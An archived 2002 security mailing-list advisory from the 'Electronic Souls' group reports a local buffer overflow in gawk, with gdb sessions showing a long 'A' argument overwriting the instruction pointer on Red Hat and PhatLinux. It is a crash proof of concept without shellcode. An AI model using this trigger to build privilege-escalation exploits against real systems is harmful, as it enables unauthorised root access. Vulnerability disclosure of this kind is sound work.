[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211290650.gAT6oJgX052483@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Gawk Overflow
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
We have extensively researched this problem in Gawk, and now have
deemed it to be a security hole. Details follow.
# cat ESgawk.txt
<-----]research!!![----->
Electronic Souls > Security Bug @!%^#%!^&#%@!(*#$@)($)*@(&$@(*$&@@$^&$#@
vux[ES] & gnome_ present: /bin/gawk, /usr/bin/gawk local buffer overflow !!
I have information(from gnome_) that gawk program is suid on slackware linux.
- --> RedHat Linux 6.2 testing:
[pom@...t pom]$ gdb /bin/gawk core
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
Core was generated by `gawk -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 6, Aborted.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x40054d21 in __kill ()
(gdb) i r
eax: 0x0 0
ecx: 0x6 6
edx: 0x401261cc 1074946508
ebx: 0xa23 2595
esp: 0xbfffae9c -1073762660
ebp: 0xbfffaeac -1073762644
esi: 0xbfffb0f3 -1073762061
edi: 0xbfffaec4 -1073762620
eip: 0x40054d21 1074089249
eflags: 0x207 IOPL: 0; flags: CF PF IF
orig_eax: 0x25 37
cs: 0x23 35
ss: 0x2b 43
ds: 0x2b 43
es: 0x2b 43
fs: 0x2b 43
gs: 0x2b 43
(gdb)
(gdb) r -f `perl -e'print "A"x8543'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`
Program received signal SIGSEGV, Segmentation fault.
strcpy (dest=0xbfffb123 'A' <repeats 200 times>...,
src=0x41414141 <Address 0x41414141 out of bounds>)
at ../sysdeps/generic/strcpy.c:37
./sysdeps/generic/strcpy.c:37: No such file or directory.
(gdb)i r
eax: 0x7ebe6fe2 2126409698
ecx: 0x7ebe6fe1 2126409697
edx: 0x41414141 1094795585
ebx: 0xbfffb123 -1073762013
esp: 0xbfffb0f4 -1073762060
ebp: 0xbfffb0f8 -1073762056
esi: 0xbfffb123 -1073762013
edi: 0xbfffb114 -1073762028
eip: 0x400947a1 1074349985
eflags: 0x10a06 IOPL: 0; flags: PF IF OF RF
orig_eax: 0xffffffff -1
cs: 0x23 35
ss: 0x2b 43
ds: 0x2b 43
es: 0x2b 43
fs: 0x0 0
gs: 0x0 0
- --> PhatLinux testing:
(gdb)
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
(gdb) r -f `perl -e'print "A"x8543'`
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0x24 36
edx 0x24 36
ebx 0xfffffffa -6
esp 0xbfffd174 0xbfffd174
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb)
h4h4 - (c) 2002 vux //fEAr!
greetz to: gnome_, Brain Storm[ES] & ES-team.
fuckz to : Nia*[ES], CraigTM[ES].
#
Be sure to patch immediately.
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"People get drunk drinking alcohol."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nDjoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltjwwAoI24zPTruD5h
T9FPXknQE8zEBkuTAJ4w47RIT3fk0+Gb11sGT726yWW70w==
=SplS
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists